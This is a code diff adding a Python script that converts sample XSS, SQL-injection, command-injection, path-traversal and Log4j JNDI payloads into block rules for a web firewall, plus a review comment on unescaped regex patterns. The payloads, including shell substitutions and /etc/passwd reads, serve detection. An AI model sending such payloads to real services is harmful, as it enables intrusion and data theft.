diff --git a/get_vulnerability_rules.py b/get_vulnerability_rules.py
new file mode 100644
index 0000000..dad6bb8
--- /dev/null
+++ b/get_vulnerability_rules.py
@@ -0,0 +1,76 @@
+import json
+import logging
+
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+
+def generate_vulnerability_rules(output_path):
+ """Generates rules from a predefined list of vulnerability payloads."""
+ all_rules = []
+ payloads = {
+ "xss": {
+ "patterns": [
+ "",
+ "
",
+ "javascript:alert(1)",
+ "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" #base64 encoded script tag
+ ],
+ "targets": ["ARGS", "BODY", "HEADERS"]
+ },
+ "sqli": {
+ "patterns": [
+ "1' OR '1'='1",
+ "'; SELECT * FROM users;",
+ "\" OR \"1\"=\"1",
+ "UNION SELECT 1,2,3;"
+ ],
+ "targets": ["ARGS", "BODY", "HEADERS"]
+ },
+ "rce": {
+ "patterns": [
+ "`whoami`",
+ "$(whoami)",
+ "; ls -la;",
+ "| id"
+ ],
+ "targets": ["ARGS", "HEADERS"]
+ },
+ "lfi":{
+ "patterns":[
+ "../etc/passwd",
+ "../../../../etc/passwd"
+ ],
+ "targets":["URI"]
+ },
+ "log4j": {
+ "patterns": [
+ "${jndi:ldap://example.com/a}",
+ "${jndi:rmi://example.com/b}",
+ "${jndi:dns://example.com/c}"
+ ],
+ "targets": ["ARGS", "BODY", "HEADERS"]
+ },
+ }
+
+ rule_counter = 0
+ for vuln_type, data in payloads.items():
+ for pattern in data["patterns"]:
+ rule = {
+ "id": f"{vuln_type}-{rule_counter}",
+ "phase": 2,
+ "pattern": f"(?i){pattern}",
+ "targets": data["targets"],
+ "severity": "HIGH",
+ "action": "block",
+ "score": 7,
+ "description": f"Detects {vuln_type} attack payload: {pattern}"
+ }
+ all_rules.append(rule)
+ rule_counter += 1
+ logging.info(f"Generated {len(all_rules)} rules from vulnerability payloads.")
+ with open(output_path, 'w') as f:
+ json.dump(all_rules, f, indent=2)
+ logging.info(f"Saved {len(all_rules)} rules to {output_path}")
+
+if __name__ == "__main__":
+ output_path = "vulnerability_rules.json"
+ generate_vulnerability_rules(output_path)
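Review bot: The payload strings are interpolated unescaped at `"pattern": f"(?i){pattern}"`, and the `(?i)` prefix suggests the consumer compiles them as regular expressions. If so, `| id` has an empty left alternative and matches every input, which with `"action": "block"` would reject all ARGS/HEADERS traffic, while `$(whoami)` and the `${jndi:...}` entries start with an end-of-input anchor and in most regex engines can never match the literal text. Add `import re` and emit `f"(?i){re.escape(pattern)}"`, and skip empty entries with `if not pattern: continue`, since the first xss pattern as shown here is `""` and would likewise match everything. Separately, the log4j entries are pinned to `example.com`, so even once escaped they would only catch lookups to that host; a rule keyed on the `${jndi:` prefix would cover the class rather than one sample.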